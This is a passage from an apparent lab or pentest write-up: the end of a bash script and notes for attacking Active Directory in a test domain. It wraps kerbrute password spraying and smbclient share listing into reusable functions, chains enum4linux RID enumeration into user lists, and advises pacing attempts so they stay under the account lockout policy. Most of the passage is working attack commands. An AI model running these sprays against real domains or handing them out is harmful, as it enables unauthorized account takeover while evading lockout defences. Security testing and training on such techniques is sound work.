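# One password against every user in USERFILE (kerbrute passwordspray), so
# each account is touched once per round; --safe makes kerbrute abort as
# soon as the KDC reports a locked-out account. Repeat per password with a
# pause that fits the lockout window you observed. Looping rockyou over a
# single account, as the page does with bruteuser, is only sane in a lab
# without a lockout policy. Assumes "kerbrute" is on PATH.
spray_one() {
  dc=$1; domain=$2; users=$3; password=$4
  command -v kerbrute >/dev/null 2>&1 || { echo "kerbrute not in PATH" >&2; return 127; }
  kerbrute passwordspray --dc "$dc" -d "$domain" -t 20 --safe "$users" "$password"
}

# smb_check DC USER PASSWORD: confirm a kerbrute hit over SMB by listing
# shares. Credentials are passed as -U user%password; smbclient's -p is the
# port option and would leave you at the password prompt.
smb_check() {
  dc=$1; user=$2; password=$3
  command -v smbclient >/dev/null 2>&1 || { echo "smbclient not in PATH" >&2; return 127; }
  smbclient -L "$dc" -U "${user}%${password}"
}

# ./ridusers.sh demo                                 -> run on the sample above
# enum4linux -r 172.16.0.20 | ./ridusers.sh filter   -> users.txt for kerbrute
# . ./ridusers.sh; spray_one 172.16.0.20 test.lab users.txt 'P@ssw0rd'
case "${1:-}" in
  demo)   printf '%s\n' "$SAMPLE_ENUM4LINUX" | enum_users ;;
  filter) enum_users ;;
esac
```

Feed the user list first to `kerbrute userenum --dc 172.16.0.20 -d test.lab users.txt` to drop RIDs that resolve but cannot authenticate, then spray; one round per password keeps the attempt count per account at the level the lockout policy allows.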
